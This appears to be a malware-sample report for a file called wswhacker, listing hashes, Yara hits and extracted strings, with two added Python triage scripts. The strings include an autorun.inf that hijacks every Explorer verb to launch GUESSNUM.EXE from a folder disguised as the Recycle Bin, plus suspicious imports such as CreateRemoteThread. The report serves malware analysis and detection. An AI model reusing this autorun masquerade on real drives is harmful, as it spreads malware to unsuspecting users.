Sample details: 655d7890f348fde289ff0d5f56d23199 --

Hashes
MD5: 655d7890f348fde289ff0d5f56d23199
SHA1: 104805cd325aed892217bef251000d1e2ecf7488
SHA256: fbe64364844a95f9ee71ec94dd45989a109d08baee619b3159de499ab993762d
SSDEEP: 3072:xXXhV77w8GrxJEXhKuXhKSE1jcJE1GlJO+ePJO+eP6E1GlTzqE1ONO+ePz:d7TXJX89caqezenOfs/eb
Details
File Type: Composite
Added: 2019-01-23 20:43:17
Yara Hits
CuckooSandbox/embedded_pe | CuckooSandbox/embedded_win_api | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/DebuggerCheck__RemoteAPI | YRP/DebuggerException__ConsoleCtrl | YRP/SEH__vba | YRP/anti_dbg | YRP/win_files_operation
Strings
urn:schemas-microsoft-com:office:smarttags
chmetcnv
urn:schemas-microsoft-com:office:smarttags
chsdate
HasSpace
IsLunarDate	
IsROCDate
Negative
NumberType
SourceValue
UnitName
MC SYSTEM
Normal
MC SYSTEM
Microsoft Office Word
MC SYSTEM
Microsoft Office Word 
MSWordDoc
Word.Document.8
wswhacker.doc
urn:schemas-microsoft-com:office:smarttags
country-region
Normal
Microsoft Office Word
Microsoft Office Word 
MSWordDoc
Word.Document.8
wswhacker.inf[AutoRun]
Open=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\open\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\explore\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\find\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
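The [AutoRun] section above is the part of this composite that actually launches something: every Explorer verb on the volume (Open, Explore, Search) is pointed at one executable inside a folder whose name carries the Recycle Bin shell CLSID, so the folder is rendered as a Recycle Bin and the payload hides in plain sight. The following is an added triage script, not part of the sample or of this page; it parses that section (copied here as constructed input, alongside a made-up benign autorun.inf for contrast) and reports the masquerade and the verb hijack. Finding names and the BENIGN_AUTORUN text are this example's own.

```python
import re

# Shell-folder CLSID of the Windows Recycle Bin. Explorer renders a directory
# named "<name>.{CLSID}" as that shell object, so a folder such as
# RECYCLER.{645FF040-...} looks like the real Recycle Bin and its contents
# are hidden from a casual browse.
RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"

# Constructed sample input: the [AutoRun] section copied from the
# wswhacker.inf strings above.
SAMPLE_AUTORUN = """[AutoRun]
Open=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\\open\\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\\explore\\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\\find\\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
"""

# A benign autorun.inf for comparison (constructed, not from the sample).
BENIGN_AUTORUN = """[AutoRun]
icon=setup.exe,0
label=Vendor installer
"""


def parse_autorun(text):
    """Return {key: value} for the launch-relevant keys of the [AutoRun] section.

    Keys are lower-cased. Only 'open' and 'shell\\<verb>\\command' are kept,
    since those are the entries Explorer executes.
    """
    commands = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = key.strip().lower()
        if key == "open" or (key.startswith("shell\\") and key.endswith("\\command")):
            commands[key] = value.strip()
    return commands


def basename(path):
    # Accept both slash styles; autorun.inf paths use either.
    return re.split(r"[\\/]", path)[-1]


def analyse_autorun(text):
    commands = parse_autorun(text)
    findings = []
    targets = {basename(v).upper() for v in commands.values()}
    joined = " ".join(commands.values()).upper()

    if RECYCLE_BIN_CLSID in joined:
        findings.append("recycle_bin_clsid_masquerade")
    if "RECYCLER" in joined:
        findings.append("payload_under_recycler_folder")
    # Open, shell\open, shell\explore and shell\find all redirected means every
    # Explorer verb on the drive (double-click, Explore, Search) runs the payload.
    verbs = {"open", "shell\\open\\command", "shell\\explore\\command", "shell\\find\\command"}
    if verbs <= set(commands):
        findings.append("all_explorer_verbs_hijacked")
    if len(targets) == 1 and commands:
        findings.append("single_target")

    return {
        "commands": commands,
        "target": next(iter(targets)) if len(targets) == 1 else None,
        "findings": findings,
    }


if __name__ == "__main__":
    for name, text in (("wswhacker.inf", SAMPLE_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(name, analyse_autorun(text))
```

Run against the sample section this yields the target GUESSNUM.EXE with all four findings; the benign file yields no commands and no findings. The check is string-based on purpose: autorun.inf is an INI file and Explorer does not canonicalise the path, so case and slash style vary between samples.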
wswhacker.dllMZ
This program cannot be run in DOS mode.
<KL Autogenerated>
MSIMG32.dll
AlphaBlend
DllInitialize
GradientFill
TransparentBlt
vSetDdrawflag
wswhacker.exeMZ
This program cannot be run in DOS mode.
<KL Autogenerated>
KERNEL32.dll
AddConsoleAliasW
AddLocalAlternateComputerNameA
BackupSeek
BeginUpdateResourceW
BuildCommDCBAndTimeoutsA
CheckRemoteDebuggerPresent
CloseProfileUserMapping
CommConfigDialogW
ConvertFiberToThread
CopyFileA
CreateConsoleScreenBuffer
CreateDirectoryExA
CreateFileA
CreateHardLinkW
CreateNamedPipeW
CreatePipe
CreateProcessA
CreateRemoteThread
CreateVirtualBuffer
DeleteVolumeMountPointW
EnterCriticalSection
EnumCalendarInfoExW
EnumDateFormatsA
EnumDateFormatsW
EnumResourceLanguagesA
EnumSystemLanguageGroupsW
EnumSystemLocalesA
EnumSystemLocalesW
ExpandEnvironmentStringsA
ExpungeConsoleCommandHistoryW
FindFirstFileExW
FindNextChangeNotification
FindResourceExA
FoldStringW
FormatMessageA
FreeResource
GenerateConsoleCtrlEvent
GetCPFileNameFromRegistry
GetConsoleAliasExesLengthW
GetConsoleAliasesLengthA
GetConsoleCharType
GetConsoleCommandHistoryLengthA
GetConsoleCommandHistoryLengthW
GetConsoleCommandHistoryW
GetConsoleCursorMode
GetConsoleKeyboardLayoutNameW
GetDiskFreeSpaceExA
GetDiskFreeSpaceExW
GetDiskFreeSpaceW
GetDriveTypeA
GetEnvironmentVariableA
GetLogicalDriveStringsA
GetLogicalDriveStringsW
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetNamedPipeHandleStateA
GetNamedPipeHandleStateW
GetNumberOfConsoleFonts
GetOverlappedResult
GetPrivateProfileSectionNamesW
GetPrivateProfileStringW
GetPrivateProfileStructW
GetProcAddress
GetProfileIntW
GetProfileStringA
GetStringTypeW
GetSystemTimeAdjustment
GetSystemWindowsDirectoryA
GetSystemWow64DirectoryW
GetThreadIOPendingFlag
GetTimeZoneInformation
GetVolumeNameForVolumeMountPointA
GetWindowsDirectoryA
GlobalGetAtomNameA
GlobalReAlloc
HeapCreate
HeapQueryTagW
InitAtomTable
InterlockedExchangeAdd
IsBadCodePtr
IsSystemResumeAutomatic
IsValidLocale
IsValidUILanguage
LZDone
LoadLibraryA
LoadLibraryExW
LocalAlloc
MoveFileExA
MultiByteToWideChar
NlsConvertIntegerToString
OpenFileMappingA
OpenSemaphoreA
OutputDebugStringA
PeekNamedPipe
ReadConsoleInputExA
ReadConsoleInputExW
ReadConsoleOutputCharacterW
ReadFileScatter
ReleaseMutex
RtlCaptureContext
RtlCaptureStackBackTrace
RtlZeroMemory
ScrollConsoleScreenBufferW
SetCommState
SetComputerNameExA
SetConsoleMenuClose
SetConsoleWindowInfo
SetCurrentDirectoryA
SetDefaultCommConfigW
SetEnvironmentVariableA
SetHandleContext
SetLastConsoleEventActive
SetLastError
SetProcessShutdownParameters
SetSystemTime
SetSystemTimeAdjustment
SetThreadAffinityMask
SetThreadLocale
SetVolumeMountPointW
SuspendThread
TlsSetValue
UTUnRegister
UnmapViewOfFile
UpdateResourceA
VerSetConditionMask
VirtualFree
VirtualProtectEx
WaitCommEvent
WaitNamedPipeA
WriteConsoleInputVDMW
WriteConsoleOutputW
WritePrivateProfileStringW
_lread
_lwrite
lstrcatA
lstrcmpW
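The KERNEL32.dll import list above is what several of the Yara hits key on (DebuggerCheck__RemoteAPI matches CheckRemoteDebuggerPresent, win_files_operation matches the CreateFile/CopyFile/MoveFileEx family). The script below is an added example, not code from the page or the sample, that groups an import list into coarse capabilities the way a first-pass triage tool would. The capability table is this example's own and deliberately small; SAMPLE_IMPORTS is a constructed subset of the names listed above.

```python
# Mapping from imported API names to coarse capabilities. The categories
# mirror what the Yara hits above key on; the table itself is this example's
# own and is deliberately small.
CAPABILITIES = {
    "anti_debug": {
        "CheckRemoteDebuggerPresent", "IsDebuggerPresent",
        "OutputDebugStringA", "OutputDebugStringW",
    },
    "process_injection": {
        "CreateRemoteThread", "VirtualProtectEx", "VirtualAllocEx",
        "WriteProcessMemory", "OpenProcess",
    },
    "process_creation": {"CreateProcessA", "CreateProcessW", "WinExec"},
    "dynamic_api_resolution": {
        "LoadLibraryA", "LoadLibraryW", "LoadLibraryExW", "GetProcAddress",
    },
    "file_operations": {
        "CreateFileA", "CreateFileW", "CopyFileA", "CopyFileW",
        "MoveFileExA", "MoveFileExW", "CreateDirectoryExA", "DeleteFileA",
    },
    "drive_enumeration": {
        "GetLogicalDriveStringsA", "GetLogicalDriveStringsW",
        "GetDriveTypeA", "GetDriveTypeW",
    },
}

# Constructed input: a subset of the KERNEL32.dll imports listed above for
# wswhacker.exe, plus a few of its unrelated console/locale imports.
SAMPLE_IMPORTS = [
    "CheckRemoteDebuggerPresent", "CopyFileA", "CreateFileA", "CreateProcessA",
    "CreateRemoteThread", "GetDriveTypeA", "GetLogicalDriveStringsA",
    "GetLogicalDriveStringsW", "GetProcAddress", "LoadLibraryA", "MoveFileExA",
    "OutputDebugStringA", "VirtualProtectEx",
    "AddConsoleAliasW", "EnumDateFormatsA", "FoldStringW", "lstrcatA", "lstrcmpW",
]


def tag_imports(names):
    """Group the given import names by capability; empty categories are dropped."""
    present = set(names)
    tagged = {}
    for cap, apis in CAPABILITIES.items():
        hits = sorted(present & apis)
        if hits:
            tagged[cap] = hits
    return tagged


def untagged(names):
    """Imports that matched no category (useful for spotting padded tables)."""
    known = set().union(*CAPABILITIES.values())
    return sorted(set(names) - known)


def triage(names):
    caps = tag_imports(names)
    return {
        "capabilities": caps,
        "tagged": sum(len(v) for v in caps.values()),
        "untagged": len(untagged(names)),
        "total": len(set(names)),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_IMPORTS), indent=2))
```

Two caveats when reading the result. Import tags say what a binary could call, not what it does; the full table above mixes console, locale, serial-port and NLS functions with the interesting ones, and an unusually wide, unfocused import table is itself worth noting rather than treating each entry as a capability. Drive enumeration next to file copy in the same composite as the autorun.inf is consistent with removable-media spreading, but only execution in a sandbox confirms it.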
wswhacker.exeMZ
!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
Left  Project1
 =   12
xCAT - Anti-Shutdown v1.00
Command1
Label5
Shutdowns stopped this session
Label4
Label3
Shutdowns stopped by xCAT- Anti-Shutdown
Label2
Label1
mnu_home
mnu_allow
Allow Shutdown
mnu_sep1
mnu_shutter
Shutdown
mnu_logoff
Normal LogOff
mnu_forcelogoff
Force LogOff
mnu_eferferfer
mnu_reboot
Normal Reboot
mnu_forcereboot
Force Reboot
mnu_nullzzzz
mnu_manual
Normal Shutdown
mnu_force
Force Shutdown
mnu_null1
mnu_about
mnu_exit
antishutdown
Project1
Project1
Project1
mdlStopShutdown
Module1
Module2
mnu_reboot
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
mnu_shutter
mnu_eferferfer
mnu_force
mnu_allow
mnu_logoff
mnu_manual
mnu_exit
Label5
mnu_nullzzzz
Command1
Label4
Label1
Label2
Label3
mnu_forcelogoff
mnu_forcereboot
mnu_about
mnu_null1
mnu_home
mnu_sep1
shell32.dll
Shell_NotifyIconA
ExitWindowsEx
user32
CallWindowProcA
SetWindowLongA
GetMessageA
VBA6.DLL
__vbaFreeVar
__vbaVarOr
__vbaI4Var
__vbaSetSystemError
__vbaErrorOverflow
__vbaStrCopy
__vbaRecUniToAnsi
__vbaFpI4
__vbaOnError
__vbaStrI2
__vbaStrI4
__vbaI4Str
__vbaFreeObjList
__vbaFreeStrList
__vbaStrCat
__vbaStrMove
__vbaFreeStr
__vbaCastObj
__vbaObjSet
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSetAddref
__vbaNew2
__vbaRecAnsiToUni
__vbaLateIdCallLd
__vbaLsetFixstr
MSVBVM60.DLL
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaFreeVar
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaStrCat
__vbaLsetFixstr
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
_CIsin
__vbaChkstk
EVENT_SINK_AddRef
DllFunctionCall
__vbaVarOr
_adj_fpatan
__vbaLateIdCallLd
__vbaRecUniToAnsi
EVENT_SINK_Release
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
_CIlog
__vbaErrorOverflow
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaI4Str
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaI4Var
__vbaFpI4
_CIatan
__vbaCastObj
__vbaStrMove
_allmul
_CItan
_CIexp
__vbaFreeObj
__vbaFreeStr
wswhacker.batwswhacker.gifGIF89a 
;wswhacker.batwswhacker.ini[boot loader]
timeout=1
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn